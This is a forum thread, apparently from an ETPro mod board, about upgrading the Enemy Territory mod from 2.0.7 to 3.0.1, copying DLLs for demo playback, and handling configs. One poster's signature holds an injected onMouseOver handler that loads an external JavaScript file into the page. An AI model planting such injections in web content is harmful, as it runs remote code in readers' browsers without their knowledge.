ETPro 3.0.1 installation..?

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

O2.iceman

ETPro 3.0.1 installation..?

Post by O2.iceman »

Currently have 2.0.7; do I have to install ETPro 3.0.0 first, and then 3.0.1, or can I go straight from 2.0.7 to 3.0.1?

Thanks
O2.iceman
Oxygen
ReyalP

Post by ReyalP »

For a client, you shouldn't have to do anything. Just connect to an etpro 3.0.1 server, autodownload, (possibly crash after download is done), reconnect, and you are good to go. You should still be able to play on 2.0.7 servers with no problems.

You can also manually download the .zip and unzip it into your existing e folder (the zip itself contains an etpro folder which).

If you try to host a local game (or watch demos) with both 2.0.7 and 3.0.1 installed, you may run into issues with mismatched .dlls.

For a server, you install just etpro 3.0.1.
send lawyers, guns and money
Threshold

Post by Threshold »

I deleted my Whole folder and installed 3.0.1 fresh but then I had to copy cgame_mp_x86.dll and ui_mp_x86.dll out of the etpro-3_0_1.pk3 into the ETPRO dir to get demo's to work.

I am not sure you need to do that if you just connect to a server since Rain posted that the cgame_mp_x86.dll and ui_mp_x86.dll have to be update since they made some change for scripting or something starting 3/29/04? It seems allot of people are getting the BG error. I posted the FIX on the TWL website.
KingJackaL

Post by KingJackaL »

He runs a large number of public servers, so yes he's talking server-side ;).

And the answer is: 3.0.1 is a full install package, it'll upgrade from * ( where * < 3.0.1 :lol: ).
Threshold

Post by Threshold »

KingJackaL wrote:He runs a large number of public servers, so yes he's talking server-side ;).

And the answer is: 3.0.1 is a full install package, it'll upgrade from * ( where * < 3.0.1 :lol: ).
Well my question is than why would someone need to copy those files from the ETPRO.pk3 file to get demo's to work? Should that be apart of a clean install? There are many "new people" out there that will have problems and no idea how to fix it.
Last edited by Threshold on Tue Apr 13, 2004 9:46 am, edited 1 time in total.
Rain

Post by Rain »

Threshold wrote:Well my question is than why would someone need to copy those files from the ETPRO.pk3 file to get demo's to work? Should that be apart of a clean install? There are many n00b's out there that will have problems and no idea how to fix it.
The game can't load the gamecode modules from inside the pk3, and it won't extract them unless it has to in order to play on a server.

If you install the pk3 and connect to an etpro 3.0.1 server (or, in theory, create a local one for a moment), you're good to go. If you connect to an older server, though, the cgame and ui dll/so will be extracted from the appropriate pk3s and overwrite your existing ones, though.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
ReyalP

Post by ReyalP »

In the future, much of this confusion could be avoided the the major version number was part of the mod directory name... eg etpro2, etpro3
bani
Site Admin

Post by bani »

and then everyone would get to redo their configs when they connect to an etpro# server. because it would copy the default cfg's into the new directory. funfunfun.

not to mention the problems this would cause with server hosting, where fs_game is soetimes a pita to change.
=FF=im2good4u

Post by =FF=im2good4u »

bani wrote:and then everyone would get to redo their configs when they connect to an etpro# server. because it would copy the default cfg's into the new directory. funfunfun.

not to mention the problems this would cause with server hosting, where fs_game is soetimes a pita to change.
you can easely redo your config in the config menu :D
GnF|^Bamboo

Post by GnF|^Bamboo »

If your configuration contains only the parameters available in the menus, then yes. But it is only the case of some people.
It's easy to copy the config file from a directory to another but when you change your config too often, that comes annoying.
GnF|^Bamboo
Visit us on Quakenet : #GNFclan
O2.iceman

Post by O2.iceman »

not to mention the problems this would cause with server hosting, where fs_game is soetimes a pita to change
Bani knows the score there.. Changing fs_game all the time is a pain in the arse and should be avoided.

Some server hosting companies don't give you shell access, so it's very difficult to put a mod on in the first place, let alone ask them to change the executable shell script every time a new version of a mod comes out.

And thanks for the answers, i'll install ETPro 3.0.1 directly over 2.0.7 :)
O2.iceman
Oxygen
ReyalP

Post by ReyalP »

O2.iceman wrote:
not to mention the problems this would cause with server hosting, where fs_game is soetimes a pita to change
Bani knows the score there.. Changing fs_game all the time is a pain in the arse and should be avoided.
Hmmm, I would word that 'incompetent server hosting companies are a pain in the ass and should be avoided'

Player configs... I see the point. Although, you really only have to copy your config files from etpro2 to etpro3. Also, with some of the changes (like the spawnpoints in fueldump and battery) you might want different configs for etpro2 and etpro3. A user would only have to do this once per major version. Is that better or worse than the current client dll issues ? *shrug*

Hopefully, the majority of servers will upgrade to 3.0.1 and this will settle down.
BOTA

Post by BOTA »

I hate profiles and after having deleted them all from every directory.
I decided never to make one again.
So it keeps asking me for it everytime I start ET.
But I ignore it and do not make one.
And us a config inside my etmain (autoexec.cfg) as the source of all my binds and stuff.
And it works great.
1 config, no hassle.
I change something not in the config?
I copy/paste it from the relevant mod dir's etconfig.cfg.